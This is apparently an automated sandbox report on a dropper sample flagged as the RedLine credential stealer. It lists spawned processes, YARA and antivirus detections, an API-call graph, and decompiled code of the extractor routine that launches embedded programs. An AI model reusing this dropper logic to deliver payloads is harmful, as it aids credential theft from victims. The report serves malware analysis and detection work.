                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\twl97yF91.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:382976 bytes
                                                                                                                                                                                                        MD5 hash:8B79F6A1B67F97CA971CEF540ABF22E7
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000003.256499672.0000000002D50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: ditekSHen
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.323169357.0000000004DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.322917583.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.322488235.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.333480133.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.257010194.0000000002ECF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.322292427.0000000002E68000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 64%, ReversingLabs
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:09:30:24
                                                                                                                                                                                                        Start date:27/02/2023
                                                                                                                                                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        Imagebase:0x7ff759b10000
                                                                                                                                                                                                        File size:69632 bytes
                                                                                                                                                                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
Reputation:high

Target ID:14
Start time:09:30:54
Start date:27/02/2023
Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe
Imagebase:0x2b0000
File size:179317 bytes
MD5 hash:763CFA2A099AC8748401DF32FF369ACE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000000.337013680.00000000002B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.435203327.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.435203327.000000000290E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\uPD30tM82.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 77%, ReversingLabs
Reputation:low


Execution Graph

Execution Coverage:26.9%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:28.3%
Total number of Nodes:967
Total number of Limit Nodes:42
API calls 3040->3041 3041->3034 3043 862218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3028 3046 864016 CreateProcessA 3045->3046 3057 864106 3045->3057 3047 8640c4 3046->3047 3048 864041 WaitForSingleObject GetExitCodeProcess 3046->3048 3051 866285 GetLastError 3047->3051 3052 864070 3048->3052 3049 866ce0 4 API calls 3050 864117 3049->3050 3050->2774 3054 8640c9 GetLastError FormatMessageA 3051->3054 3116 86411b 3052->3116 3055 8644b9 20 API calls 3054->3055 3055->3057 3056 864096 CloseHandle CloseHandle 3056->3057 3058 8640ba 3056->3058 3057->3049 3058->3057 3060 8664c2 3059->3060 3061 86658a CharPrevA 3060->3061 3062 8664d8 GetFileAttributesA 3061->3062 3063 866501 LoadLibraryA 3062->3063 3064 8664ea 3062->3064 3066 866508 3063->3066 3064->3063 3065 8664ee LoadLibraryExA 3064->3065 3065->3066 3067 866ce0 4 API calls 3066->3067 3068 866513 3067->3068 3068->2791 3070 862381 3069->3070 3071 862289 RegOpenKeyExA 3069->3071 3072 866ce0 4 API calls 3070->3072 3071->3070 3073 8622b1 RegQueryValueExA 3071->3073 3074 86238c 3072->3074 3075 8622e6 memset GetSystemDirectoryA 3073->3075 3076 862374 RegCloseKey 3073->3076 3074->2764 3077 862321 3075->3077 3078 86230f 3075->3078 3076->3070 3079 86171e _vsnprintf 3077->3079 3080 86658a CharPrevA 3078->3080 3081 86233f RegSetValueExA 3079->3081 3080->3077 3081->3076 3084 861a9a 3083->3084 3086 861aba 3084->3086 3088 861aaf 3084->3088 3102 86667f 3084->3102 3086->2982 3087 86667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 862ad4 GetModuleFileNameA 3089->3090 3091 862be6 3089->3091 3092 862b02 3090->3092 3093 866ce0 4 API calls 3091->3093 3092->3091 3094 862af1 IsDBCSLeadByte 3092->3094 3096 862b11 CharNextA CharUpperA 3092->3096 3097 862bca CharNextA 3092->3097 3098 862bd3 CharNextA 3092->3098 3101 862b43 CharPrevA 3092->3101 3107 8665e8 3092->3107 3095 862bf5 3093->3095 3094->3092 3095->3001 3096->3092 3099 862b8d CharUpperA 3096->3099 3097->3098 3098->3092 3099->3092 3101->3092 3104 866689 3102->3104 3103 
8666a5 3103->3084 3104->3103 3105 866648 IsDBCSLeadByte 3104->3105 3106 866697 CharNextA 3104->3106 3105->3104 3106->3104 3108 8665f4 3107->3108 3108->3108 3109 8665fb CharPrevA 3108->3109 3110 866611 CharPrevA 3109->3110 3111 86660b 3110->3111 3112 86661e 3110->3112 3111->3110 3111->3112 3113 86663d 3112->3113 3114 866627 CharPrevA 3112->3114 3115 866634 CharNextA 3112->3115 3113->3092 3114->3113 3114->3115 3115->3113 3117 864132 3116->3117 3119 86412a 3116->3119 3120 861ea7 3117->3120 3119->3056 3121 861eba 3120->3121 3122 861ed3 3120->3122 3123 86256d 15 API calls 3121->3123 3122->3119 3123->3122 3125 862026 3124->3125 3126 861ff0 RegOpenKeyExA 3124->3126 3125->2480 3126->3125 3127 86200f RegDeleteValueA RegCloseKey 3126->3127 3127->3125 3236 8619e0 3237 861a24 GetDesktopWindow 3236->3237 3238 861a03 3236->3238 3239 8643d0 11 API calls 3237->3239 3240 861a16 EndDialog 3238->3240 3241 861a20 3238->3241 3242 861a33 LoadStringA SetDlgItemTextA MessageBeep 3239->3242 3240->3241 3243 866ce0 4 API calls 3241->3243 3242->3241 3244 861a7e 3243->3244 3245 866a20 __getmainargs 3246 866bef _XcptFilter 3247 8669b0 3248 8669b5 3247->3248 3256 866fbe GetModuleHandleW 3248->3256 3250 8669c1 __set_app_type __p__fmode __p__commode 3251 8669f9 3250->3251 3252 866a02 __setusermatherr 3251->3252 3253 866a0e 3251->3253 3252->3253 3258 8671ef _controlfp 3253->3258 3255 866a13 3257 866fcf 3256->3257 3257->3250 3258->3255 3259 8634f0 3260 863504 3259->3260 3280 8635b8 3259->3280 3261 8635be GetDesktopWindow 3260->3261 3262 86351b 3260->3262 3260->3280 3265 8643d0 11 API calls 3261->3265 3266 86354f 3262->3266 3267 86351f 3262->3267 3263 863526 3264 863671 EndDialog 3264->3263 3268 8635d6 3265->3268 3266->3263 3270 863559 ResetEvent 3266->3270 3267->3263 3269 86352d TerminateThread EndDialog 3267->3269 3271 8635e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3268->3271 3272 86361d SetWindowTextA CreateThread 3268->3272 3269->3263 3273 8644b9 20 API calls 3270->3273 3271->3272 
3272->3263 3274 863646 3272->3274 3275 863581 3273->3275 3277 8644b9 20 API calls 3274->3277 3276 86359b SetEvent 3275->3276 3278 86358a SetEvent 3275->3278 3279 863680 4 API calls 3276->3279 3277->3280 3278->3263 3279->3280 3280->3263 3280->3264 3281 866ef0 3282 866f2d 3281->3282 3284 866f02 3281->3284 3283 866f27 ?terminate@ 3283->3282 3284->3282 3284->3283 3285 867270 _except_handler4_common

Callgraph

[Figure: function callgraph. Legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available.]

Control-flow Graph

[Figure: control-flow graph. Legend: Executed; Not Executed.]
                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E00863BA2() {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                          				char _v280;
                                                                                                                                                                                                          				short _v300;
                                                                                                                                                                                                          				intOrPtr _v304;
                                                                                                                                                                                                          				void _v348;
                                                                                                                                                                                                          				char _v352;
                                                                                                                                                                                                          				intOrPtr _v356;
                                                                                                                                                                                                          				signed int _v360;
                                                                                                                                                                                                          				short _v364;
                                                                                                                                                                                                          				char* _v368;
                                                                                                                                                                                                          				intOrPtr _v372;
                                                                                                                                                                                                          				void* _v376;
                                                                                                                                                                                                          				intOrPtr _v380;
                                                                                                                                                                                                          				char _v384;
                                                                                                                                                                                                          				signed int _v388;
                                                                                                                                                                                                          				intOrPtr _v392;
                                                                                                                                                                                                          				signed int _v396;
                                                                                                                                                                                                          				signed int _v400;
                                                                                                                                                                                                          				signed int _v404;
                                                                                                                                                                                                          				void* _v408;
                                                                                                                                                                                                          				void* _v424;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                          				signed int _t79;
                                                                                                                                                                                                          				short _t96;
                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                          				intOrPtr _t98;
                                                                                                                                                                                                          				signed int _t101;
                                                                                                                                                                                                          				signed int _t104;
                                                                                                                                                                                                          				signed int _t108;
                                                                                                                                                                                                          				int _t112;
                                                                                                                                                                                                          				void* _t115;
                                                                                                                                                                                                          				signed char _t118;
                                                                                                                                                                                                          				void* _t125;
                                                                                                                                                                                                          				signed int _t127;
                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                          				struct HINSTANCE__* _t129;
                                                                                                                                                                                                          				void* _t130;
                                                                                                                                                                                                          				short _t137;
                                                                                                                                                                                                          				char* _t140;
                                                                                                                                                                                                          				signed char _t144;
                                                                                                                                                                                                          				signed char _t145;
                                                                                                                                                                                                          				signed int _t149;
                                                                                                                                                                                                          				void* _t150;
                                                                                                                                                                                                          				void* _t151;
                                                                                                                                                                                                          				signed int _t153;
                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                                          				signed int _t157;
                                                                                                                                                                                                          				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x868004; // 0xb82e2007
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x869124 =  *0x869124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x868a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x868c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0086468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x869124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00861AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00866CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00863FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x868580;
													if( *0x868580 != 0) {
														E00862267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x868180;
											if( *0x868180 == 0) {
												_t146 = 0x4c7;
												E008644B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x869124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x869a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00866495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E008644B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x869124 = E00866285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E008644B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x868a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x869a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x868a38 & 0x0000ffff;
											_v380 = 0x869154;
											_v376 = _t151;
											_v372 = 0x8691e4;
											_v360 = _t97;
											if( *0x868a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
                                                                                                                                                                                                          												_v360 = _t97;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t144 =  *0x869a34; // 0x1
                                                                                                                                                                                                          											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                          											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                          												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                          												__eflags = _t97;
                                                                                                                                                                                                          												_v360 = _t97;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                          											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                          												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                          												__eflags = _t97;
                                                                                                                                                                                                          												_v360 = _t97;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t145 =  *0x868d48; // 0x0
                                                                                                                                                                                                          											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                          											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                          												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                          												__eflags = _t97;
                                                                                                                                                                                                          												_v360 = _t97;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t145;
                                                                                                                                                                                                          											if(_t145 < 0) {
                                                                                                                                                                                                          												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                          												__eflags = _t104;
                                                                                                                                                                                                          												_v360 = _t104;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t98 =  *0x869a38; // 0x0
                                                                                                                                                                                                          											_v356 = _t98;
                                                                                                                                                                                                          											_t130 = _t146;
                                                                                                                                                                                                          											 *0x86a288( &_v384);
                                                                                                                                                                                                          											_t101 = _v404();
                                                                                                                                                                                                          											__eflags = _t164 - _t164;
                                                                                                                                                                                                          											if(_t164 != _t164) {
                                                                                                                                                                                                          												_t130 = 4;
                                                                                                                                                                                                          												asm("int 0x29");
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											 *0x869124 = _t101;
                                                                                                                                                                                                          											_push(_t129);
                                                                                                                                                                                                          											__eflags = _t101;
                                                                                                                                                                                                          											if(_t101 < 0) {
                                                                                                                                                                                                          												FreeLibrary();
                                                                                                                                                                                                          												goto L61;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												FreeLibrary();
                                                                                                                                                                                                          												_t127 = _v400;
                                                                                                                                                                                                          												goto L58;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags =  *0x869a40 - 1; // 0x3
                                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags =  *0x868a20;
                                                                                                                                                                                                          										if( *0x868a20 == 0) {
                                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										__eflags = _t157;
                                                                                                                                                                                                          										if(_t157 != 0) {
                                                                                                                                                                                                          											goto L38;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v388 = 1;
                                                                                                                                                                                                          										E0086202A(_t146); // executed
                                                                                                                                                                                                          										goto L37;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t146 =  &_v280;
                                                                                                                                                                                                          									_t108 = E0086468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                          									__eflags = _t108;
                                                                                                                                                                                                          									if(_t108 == 0) {
                                                                                                                                                                                                          										goto L25;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags =  *0x868c42;
                                                                                                                                                                                                          									if( *0x868c42 != 0) {
                                                                                                                                                                                                          										goto L69;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                          									__eflags = _t112 == 0;
                                                                                                                                                                                                          									if(_t112 == 0) {
                                                                                                                                                                                                          										goto L69;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L31;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t118 =  *0x868a38; // 0x0
                                                                                                                                                                                                          								if(_t118 == 0) {
                                                                                                                                                                                                          									L23:
                                                                                                                                                                                                          									if(_t153 != 0) {
                                                                                                                                                                                                          										goto L31;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t146 =  &_v276;
                                                                                                                                                                                                          									if(E0086468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                          										goto L27;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L25;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                          									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                          									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                          										goto L62;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t140 = "USRQCMD";
                                                                                                                                                                                                          									L20:
                                                                                                                                                                                                          									_t146 =  &_v276;
                                                                                                                                                                                                          									if(E0086468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                          										goto L25;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                          										_t153 = 1;
                                                                                                                                                                                                          										_v388 = 1;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t140 = "ADMQCMD";
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L26:
                                                                                                                                                                                                          						_push(_t130);
                                                                                                                                                                                                          						_t146 = 0x104;
                                                                                                                                                                                                          						E00861781( &_v276, 0x104, _t130, 0x868c42);
                                                                                                                                                                                                          						goto L27;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t130 = "REBOOT";
                                                                                                                                                                                                          				_t125 = E0086468F(_t130, 0x869a2c, 4);
                                                                                                                                                                                                          				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                          					goto L25;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					goto L3;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





























































                                                                                                                                                                                                          0x00863bfd
                                                                                                                                                                                                          0x00863bff
                                                                                                                                                                                                          0x00863c03
                                                                                                                                                                                                          0x00863c03
                                                                                                                                                                                                          0x00863c11
                                                                                                                                                                                                          0x00863c16
                                                                                                                                                                                                          0x00863c19
                                                                                                                                                                                                          0x00863c28
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863c30
                                                                                                                                                                                                          0x00863c39
                                                                                                                                                                                                          0x00863c40
                                                                                                                                                                                                          0x00863d13
                                                                                                                                                                                                          0x00863d15
                                                                                                                                                                                                          0x00863d21
                                                                                                                                                                                                          0x00863d26
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863c4f
                                                                                                                                                                                                          0x00863c56
                                                                                                                                                                                                          0x00863c60
                                                                                                                                                                                                          0x00863c65
                                                                                                                                                                                                          0x00863c77
                                                                                                                                                                                                          0x00863c78
                                                                                                                                                                                                          0x00863c7c
                                                                                                                                                                                                          0x00863c7e
                                                                                                                                                                                                          0x00863c82
                                                                                                                                                                                                          0x00863c82
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863c7c
                                                                                                                                                                                                          0x00863c67
                                                                                                                                                                                                          0x00863c69
                                                                                                                                                                                                          0x00863c6d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863c58
                                                                                                                                                                                                          0x00863c58
                                                                                                                                                                                                          0x00863c6e
                                                                                                                                                                                                          0x00863c6e
                                                                                                                                                                                                          0x00863c87
                                                                                                                                                                                                          0x00863c89
                                                                                                                                                                                                          0x00863d4d
                                                                                                                                                                                                          0x00863d4f
                                                                                                                                                                                                          0x00863d50
                                                                                                                                                                                                          0x00863d52
                                                                                                                                                                                                          0x00863d9e
                                                                                                                                                                                                          0x00863da8
                                                                                                                                                                                                          0x00863daf
                                                                                                                                                                                                          0x00863db4
                                                                                                                                                                                                          0x00863db6
                                                                                                                                                                                                          0x00863f4d
                                                                                                                                                                                                          0x00863f4d
                                                                                                                                                                                                          0x00863f4f
                                                                                                                                                                                                          0x00863f56
                                                                                                                                                                                                          0x00863f57
                                                                                                                                                                                                          0x00863f58
                                                                                                                                                                                                          0x00863f63
                                                                                                                                                                                                          0x00863f63
                                                                                                                                                                                                          0x00863dbc
                                                                                                                                                                                                          0x00863dc0
                                                                                                                                                                                                          0x00863dc2
                                                                                                                                                                                                          0x00863de6
                                                                                                                                                                                                          0x00863de6
                                                                                                                                                                                                          0x00863de8
                                                                                                                                                                                                          0x00863f0b
                                                                                                                                                                                                          0x00863f0b
                                                                                                                                                                                                          0x00863f0f
                                                                                                                                                                                                          0x00863f13
                                                                                                                                                                                                          0x00863f15
                                                                                                                                                                                                          0x00863f1a
                                                                                                                                                                                                          0x00863f1c
                                                                                                                                                                                                          0x00863f46
                                                                                                                                                                                                          0x00863f47
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863f47
                                                                                                                                                                                                          0x00863f1e
                                                                                                                                                                                                          0x00863f1f
                                                                                                                                                                                                          0x00863f25
                                                                                                                                                                                                          0x00863f26
                                                                                                                                                                                                          0x00863f2a
                                                                                                                                                                                                          0x00863f2d
                                                                                                                                                                                                          0x00863fd9
                                                                                                                                                                                                          0x00863fd9
                                                                                                                                                                                                          0x00863fda
                                                                                                                                                                                                          0x00863fda
                                                                                                                                                                                                          0x00863fe1
                                                                                                                                                                                                          0x00863fe3
                                                                                                                                                                                                          0x00863fe3
                                                                                                                                                                                                          0x00863fe8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863fe8
                                                                                                                                                                                                          0x00863f33
                                                                                                                                                                                                          0x00863f37
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863f37
                                                                                                                                                                                                          0x00863dee
                                                                                                                                                                                                          0x00863dee
                                                                                                                                                                                                          0x00863df5
                                                                                                                                                                                                          0x00863fad
                                                                                                                                                                                                          0x00863fb9
                                                                                                                                                                                                          0x00863fc2
                                                                                                                                                                                                          0x00863fc8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863fc8
                                                                                                                                                                                                          0x00863dfb
                                                                                                                                                                                                          0x00863dfd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863e03
                                                                                                                                                                                                          0x00863e0a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863e15
                                                                                                                                                                                                          0x00863e17
                                                                                                                                                                                                          0x00863e19
                                                                                                                                                                                                          0x00863f94
                                                                                                                                                                                                          0x00863fa4
                                                                                                                                                                                                          0x00863f7c
                                                                                                                                                                                                          0x00863f80
                                                                                                                                                                                                          0x00863f8b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863f8b
                                                                                                                                                                                                          0x00863e2c
                                                                                                                                                                                                          0x00863e30
                                                                                                                                                                                                          0x00863e34
                                                                                                                                                                                                          0x00863e36
                                                                                                                                                                                                          0x00863f69
                                                                                                                                                                                                          0x00863f6e
                                                                                                                                                                                                          0x00863f70
                                                                                                                                                                                                          0x00863f76
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863f76

APIs
• memset.MSVCRT ref: 00863C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00863CDC
  • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
